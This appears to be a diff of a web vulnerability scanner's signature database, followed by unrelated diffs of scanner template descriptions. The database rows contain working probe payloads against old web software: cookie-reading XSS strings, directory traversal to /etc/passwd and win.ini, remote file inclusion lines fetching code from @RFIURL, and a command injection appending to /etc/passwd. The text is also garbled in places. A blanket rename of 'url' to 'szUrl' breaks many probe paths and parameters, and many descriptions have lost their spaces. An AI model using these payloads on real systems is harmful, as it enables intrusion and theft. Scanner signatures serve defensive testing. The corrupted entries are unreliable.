"800098","jakarta-tomcat-4.0.1","0","Server will reveal path"
119
119
"800099","JavaWebServer","0","Probably Sun Microsystem's servlet interface. May have default code which is exploitable. Try admin/admin for id/password."
120
120
"800100","JetAdmin","0","HP Printer"
121
-
"800101","Jeus WebContainer\/([0-3]\.[0-2]\..*)","0","JEUS below 3.2.2 is vulnerable to XSS if a nonexistent url is requested, i.e. [victim site]/[javascript].jsp"
121
+
"800101","Jeus WebContainer\/([0-3]\.[0-2]\..*)","0","JEUS below 3.2.2 is vulnerable to XSS if a nonexistent szUrl is requested, i.e. [victim site]/[javascript].jsp"
122
122
"800102","Jigsaw\/([0-1].*|2\.([0-1].*|2\.0))","0","Jigsaw 2.1.0 or below may be vulnerable to XSS if a nonexistent host name is requested, i.e. nosuchhost.domain.com/<script>..."
123
123
"800103","Jigsaw\/2\.2\.1","0","Jigsaw 2.1.1 on Windows may be tricked into revealing the system path by requesting /aux two times."
124
124
"800104","JRun\/([0-3]\..*|4\.0)","0","JRun 4.0 and below on IIS is vulnerable to remote buffer overflow with a filename over 4096. http://www.macromedia.com/v1/handlers/index.cfm?ID=23500 and http://www.eeye.com/html/Research/Advisories/index.html"
skipped 1 lines
126
126
"800106","KazaaClient","0","Kazaa may allow sensitive information to be retrieved, http://www.securiteam.com/securitynews/5UP0L2K55W.html"
127
127
"800107","LabVIEW\/(5\.[1-9]|6\.[0-1])","0","LabVIEW 5.1.1 to 6.1 is vulnerable to a remote DoS by sending a malformed GET request. This DoS was not attempted."
128
128
"800108","Lasso\/3\.6\.5","0","This version of Blueworld WebData engine is vulnerable to DoS by sending a 1600 character long GET request."
129
-
"800109","LilHTTP\/2\.1","0","LilHTTP server 2.1 allows password protected resources to be retrieved by prepending '/./' to the url."
129
+
"800109","LilHTTP\/2\.1","0","LilHTTP server 2.1 allows password protected resources to be retrieved by prepending '/./' to the szUrl."
130
130
"800110","LocalWeb2000\/([0-1]\.*|2\.(0\.*|1\.0))","0","LocalWeb2000 2.1.0 and below allow protected files to be retrieved by prepending the request with /./"
131
131
"800111","Lotus-Domino\/([0-3].*|4\.([0-1].*|2\.([0-1].*|3)))","0","This version of Lotus-Domino server has had multiple vulnerabilities. See the bugtraq archives for details."
132
132
"800112","Lotus-Domino\/4\.[5-6]","0","This version of Lotus-Domino server is vulnerable to a DoS via the WEb Retriever. CAN-2003-0123."
skipped 24 lines
157
157
"800137","myCIO","0","The McAfee myCIO server provides antivirus updates to clients. This server has had multiple vulnerabilities in the past."
158
158
"800138","Mylo/0\.([0-1]|2\.[0-1])","0","mod_mylo may be vulnerable to a remote buffer overflow. Upgrade to the latest version. BID-8287."
159
159
"800139","MyServer 0\.([0-3]\..*|4\.[0-2])","0","MyServer versions lower than 0.5 contain multiple remote vulnerabilities."
160
-
"800140","MyWebServer\/(0\.*|1\.0[0-2])","0","MyWebServer versions 1.02 and below are vulnerable to a DoS by requesting a url of approximately 1000 characters."
160
+
"800140","MyWebServer\/(0\.*|1\.0[0-2])","0","MyWebServer versions 1.02 and below are vulnerable to a DoS by requesting a szUrl of approximately 1000 characters."
161
161
"800141","ncsa","0","lower than v1.3 have multiple issues"
162
162
"800142","neowebscript","0","Apache plugin to allow TCL use"
163
163
"800143","netcloak","0","http://www.maxum.com plugin for webstar"
"000816","32774","4","/phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).","",""
831
831
"000817","32774","4","/phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).","",""
832
832
"000818","27071","4","/phpimageview.php?pic=javascript:alert(8754)","GET","200","alert\(8754\)","","The\sdocument\shas\smoved","","PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
833
-
"000819","0","4","/phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
833
+
"000819","0","4","/phpclassifieds/latestwap.php?szUrl=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
834
834
"000820","2193","4","/phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpBB is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","",""
835
835
"000821","4297","4","/phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>","GET","<script>javascript:alert\(document\.cookie\)<\/script>","","","","","phpBB is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
836
836
"000822","11145","4","/phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
skipped 93 lines
930
930
"000917","0","4","/admin/login.php?path=\"></form><form name=a><input name=i value=XSS><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","mcNews 1.1a from phpforums.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
931
931
"000918","2243","4","/addressbook/index.php?surname=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
932
932
"000919","2243","4","/addressbook/index.php?name=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
933
-
"000920","0","4","/add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","",""," 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
933
+
"000920","0","4","/add.php3?szUrl=ja&adurl=javascript:<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","",""," 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
934
934
"000921","0","4","/a?<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.","",""
935
935
"000922","54589","4","/a.jsp/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02.","",""
936
936
"000923","38019","4","/?mod=<script>alert(document.cookie)</script>&op=browse","GET","<script>alert\(document\.cookie\)","","","","","Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
skipped 538 lines
1475
1475
"001475","2721","7","../../../../../../../../../../etc/*","GET","passwd","","","","","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system. XF-13519, BID-8897","",""
1476
1476
"001476","2721","7","../../../../../../../../../../etc/passw*","GET","root:","","","","","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system. XF-13519, BID-8897","",""
1477
1477
"001477","2722","7","/bytehoard/index.php?infolder=../../../../../../../../../../../etc/","GET","passwd","","","","","ByteHoard 0.7 is vulnerable to a directory traversal attack. Upgrade to version 0.71 or higher.","",""
1478
-
"001478","2723","3","/Search","GET","[Ii]ndex [Oo]f ","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) ","","","","FirstClass 7.1 server allows file listing of any directory by accessing the /Search url.","",""
1478
+
"001478","2723","3","/Search","GET","[Ii]ndex [Oo]f ","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) ","","","","FirstClass 7.1 server allows file listing of any directory by accessing the /Search szUrl.","",""
1479
1479
"001479","2735","d","/musicqueue.cgi","GET","200","","","","","Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/","",""
1480
1480
"001480","2735","d","@CGIDIRSmusicqueue.cgi","GET","200","","","","","Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/","",""
1481
1481
"001481","275","3","/scripts/tools/newdsn.exe","GET","200","","","","","This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server. BID-1818. CVE-1999-0191. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)","",""
skipped 978 lines
2460
2460
"002621","3093","1","/tutos/file/file_select.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
2461
2461
"002622","3093","1","@TYPO3typo3/dev/translations.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
2462
2462
"002623","3093","1","/uifc/MultFileUploadHandler.php+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
2463
-
"002624","3093","1","/url.jsp","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
2463
+
"002624","3093","1","/szUrl.jsp","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
2464
2464
"002625","3093","1","/useraction.php3","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
2465
2465
"002626","3093","1","/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
2466
2466
"002627","3093","1","/utils/sprc.asp+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
skipped 536 lines
3003
3003
"003221","5092","3","/config.inc","GET","200","","","","","DotBr 0.1 configuration file includes usernames and passwords.","",""
3004
3004
"003222","5093","3","@CGIDIRSenviron.pl","GET","REMOTE_ADDR","","","","","Sambar Server default script reveals environment information","",""
3005
3005
"003223","5094","3","@CGIDIRStestcgi.exe","GET","REMOTE_ADDR","","","","","Sambar Server default script reveals environment information","",""
3006
-
"003224","5095","3","/sysuser/docmgr/ieedit.stm?url=../","GET","200","","","","","Sambar default file may allow directory listings.","",""
3006
+
"003224","5095","3","/sysuser/docmgr/ieedit.stm?szUrl=../","GET","200","","","","","Sambar default file may allow directory listings.","",""
3007
3007
"003225","5096","3","/sysuser/docmgr/iecreate.stm?template=../","GET","200","","","","","Sambar default file may allow directory listings.","",""
3008
3008
"003226","5097","4","/wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
3009
3009
"003227","5098","4","/sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
skipped 155 lines
3165
3165
"003384","96","7","/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. It may allow a DoS against the server. CVE-1999-0449. BID-193. MS01-033.","",""
3166
3166
"003385","9624","3","/pass_done.php","GET","200","","","","","PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.","",""
3167
3167
"003386","9624","a","/admin/admin.php?adminpy=1","GET","200","","","","","PY-Membres 4.2 may allow administrator access.","",""
3168
-
"003387","0","1","/iishelp/iis/htm/tutorial/redirect.asp","GET","A URL is required","","","","","Possibly unchecked redirect with url= variable.","",""
3168
+
"003387","0","1","/iishelp/iis/htm/tutorial/redirect.asp","GET","A URL is required","","","","","Possibly unchecked redirect with szUrl= variable.","",""
3169
3169
"003388","9695","3","/servlet/SnoopServlet","GET","Client Information","","","","","JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.","",""
"004603","5292","c","/cron.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4382
4382
"004604","5292","c","/crontab/run_billing.php?config[include_dir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4383
4383
"004605","5292","c","/crontab/run_billing.php?config[include_dir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4384
-
"004606","5292","c","/cross.php?url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4385
-
"004607","5292","c","/cross.php?url=@RFIURL ","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4384
+
"004606","5292","c","/cross.php?szUrl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4385
+
"004607","5292","c","/cross.php?szUrl=@RFIURL ","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4386
4386
"004608","5292","c","/custom_vars.php?sys[path_addon]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4387
4387
"004609","5292","c","/customer/product.php?xcart_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4388
4388
"004610","5292","c","/cwb/comanda.php?INCLUDE_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
skipped 229 lines
4618
4618
"004843","5292","c","/i_head.php?home=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4619
4619
"004844","5292","c","/i_nav.php?home=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4620
4620
"004845","5292","c","/iframe.php?file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4621
-
"004846","5292","c","/image.php?url=@RFIURL???","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4621
+
"004846","5292","c","/image.php?szUrl=@RFIURL???","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4622
4622
"004847","5292","c","/impex/ImpExData.php?systempath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4623
4623
"004848","5292","c","/import.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4624
4624
"004849","5292","c","/importinfo.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
skipped 305 lines
4930
4930
"005155","5292","c","/index.php?this_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4931
4931
"005156","5292","c","/index.php?txt=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4932
4932
"005157","5292","c","/index.php?up=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4933
-
"005158","5292","c","/index.php?url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4933
+
"005158","5292","c","/index.php?szUrl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4934
4934
"005159","5292","c","/index.php?w=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4935
4935
"005160","5292","c","/index.php?way=@RFIURL??????????????","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
4936
4936
"005161","5292","c","/index1.php?=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
skipped 538 lines
5475
5475
"005700","5292","c","/rechnung.php?_PHPLIB[libdir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
5476
5476
"005701","5292","c","/reconfig.php?GLOBALS[CLPath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
5477
5477
"005702","5292","c","/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
5478
-
"005703","5292","c","/redirect.php?url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
5478
+
"005703","5292","c","/redirect.php?szUrl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
5479
5479
"005704","5292","c","/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
5480
5480
"005705","5292","c","/register.php?base_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
5481
5481
"005706","5292","c","/releasenote.php?mosConfig_absolute_path=@RFIURL ","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
skipped 135 lines
5617
5617
"005842","5292","c","/sources/Admin/admin_templates.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
5618
5618
"005843","5292","c","/sources/functions.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
5619
5619
"005844","5292","c","/sources/help.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
5620
-
"005845","5292","c","/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
5621
-
"005846","5292","c","/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL?cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
5620
+
"005845","5292","c","/sources/join.php?FORM[szUrl]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
5621
+
"005846","5292","c","/sources/join.php?FORM[szUrl]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL?cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
5622
5622
"005847","5292","c","/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
5623
5623
"005848","5292","c","/sources/mail.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
5624
5624
"005849","5292","c","/sources/misc/new_day.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
Multiplecross-sitescripting(XSS)vulnerabilitiesinthe Sniplets 1.1.2 and 1.2.2 plugin forWordPressallow remote attackers to inject arbitrary web script or HTML via the (1)text parameter to(a) warning.php, (b)notice.php, and (c)inset.php in view/sniplets/, and possibly (d)modules/execute.php; the (2)url parameter to (e)view/admin/submenu.php; and the(3) page parameter to(f) view/admin/pager.php.
8
+
WordPress Sniplets 1.1.2 and 1.2.2 plugin containsacross-sitescriptingvulnerabilitywhichallows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php;via the url parameter to view/admin/submenu.php; and viathe page parameter to view/admin/pager.php.
description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
Cross-sitescripting(XSS)vulnerabilityinthechurch_admin plugin before 0.810 forWordPressallows remote attackers to inject arbitrary web script or HTML via the address parameter,asdemonstratedbyarequestto index.php/2015/05/21/church_admin-registration-form/.
8
+
WordPressChurchAdmin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.
description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile
description: SolarWinds Database Performance Analyzer 11.1.457 contains aninstanceofReflectedXSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
7
+
description: SolarWinds Database Performance Analyzer 11.1.457 contains areflectedcross-sitescriptingvulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
name: CrossSiteScriptinginOracle Secure Global Desktop Administration Console
4
+
name: Oracle Secure Global Desktop Administration Console4.4-Cross-SiteScripting
5
5
author: madrobot,dwisiswant0
6
6
severity: medium
7
-
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
7
+
description: Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.
description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect in a newurl parameter. The component is redirect The attack vector is The victim must open a link created by an attacker
description: Thedownload-manager plugin before 2.9.94 forWordPresshasXSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
7
+
description: WordPressDownloadManager plugin before 2.9.94 containsacross-sitescriptingvulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
description: Intheapi-bearer-auth plugin before 20190907 forWordPress,the server parameter is not correctly filtered in theswagger-config.yaml.phpfile,anditispossibletoinjectJavaScriptcode,akaXSS.
7
+
description: WordPressAPIBearerAuth plugin before 20190907 containsacross-sitescriptingvulnerability.The server parameter is not correctly filtered in swagger-config.yaml.php.
description: AnXSSissuewasdiscoveredinthechecklist plugin before 1.1.9 forWordPress. The fill parameter is not correctly filtered in the checklist-icon.php file,anditispossibletoinjectJavaScriptcode.
7
+
description: WordPressChecklist plugin before 1.1.9 containsacross-sitescriptingvulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file.
By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart.
8
+
WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard.
description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
7
+
description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.
name: Rumpus FTP Web File Manager 8.2.9.1 -Cross-SiteScripting
5
5
author: madrobot
6
6
severity: medium
7
-
description: AReflectedCrossSiteScriptingwasdiscoveredintheLoginpageofRumpus FTP Web File Manager 8.2.9.1. An attacker can exploititbysending a crafted link to end users and can execute arbitrary Javascripts
7
+
description: Rumpus FTP Web File Manager 8.2.9.1containsareflectedcross-sitescriptingvulnerabilityviatheLoginpage. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
The CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes forWordPressallowReflectedXSS via a search query.
8
+
WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes containreflectedcross-sitescriptingvulnerabilities via a search query.
name: Jira - Reflected XSS using searchOwnerUserName parameter.
4
+
name: Jira <8.1.1 - Cross-Site Scripting
5
5
author: pdteam
6
6
severity: medium
7
-
description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
7
+
description: Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
name: LabKey Server CommunityEdition<18.3.0 - Cross-SiteScripting
5
4
author: princechaddha
6
5
severity: medium
7
-
description: Reflectedcross-sitescripting(XSS)vulnerabilityinLabKey Server Community Edition before 18.3.0-61806.763 allows an unauthenticated remote attacker to inject arbitrary javascriptviatheonerror
8
-
parameter in the /__r2/query endpoints.
6
+
description: LabKey Server Community Edition before 18.3.0-61806.763 containsareflectedcross-sitescriptingvulnerabilityviatheonerrorparameterinthe/__r2/queryendpoints,whichallows an unauthenticated remote attacker to inject arbitrary JavaScript.
Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead.
7
+
Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
9
8
reference:
10
9
- https://github.com/verifysecurity/CVE-2019-7219
11
10
- https://stash.kopano.io/repos?visibility=public
11
+
- https://nvd.nist.gov/vuln/detail/CVE-2019-7219
12
+
remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead.
description: HotelDruid 2.3.0 hasXSSaffectingthe nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php.
7
+
description: HotelDruid 2.3.0 containsacross-sitescriptingvulnerabilityaffecting nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php.
name: WordPress Social Warfare <3.5.3 - Cross-Site Scripting
5
5
author: madrobot,dwisiswant0
6
6
severity: medium
7
-
description: Thesocial-warfare plugin before 3.5.3 forWordPresshasstoredXSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, asexploitedinthewildinMarch2019.Thisaffects Social Warfare and Social Warfare Pro.
7
+
description: WordPressSocialWarfare plugin before 3.5.3 containsacross-sitescriptingvulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro.
description: Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
7
+
description: Grafana through 6.7.1 containsanunauthenticated stored cross-sitescriptingvulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
The GTranslate plugin before 2.8.52 forWordPresswasvulnerableto an UnauthenticatedReflectedXSS vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.
8
+
WordPress GTranslate plugin before 2.8.52 contains an unauthenticatedreflectedcross-sitescripting vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.
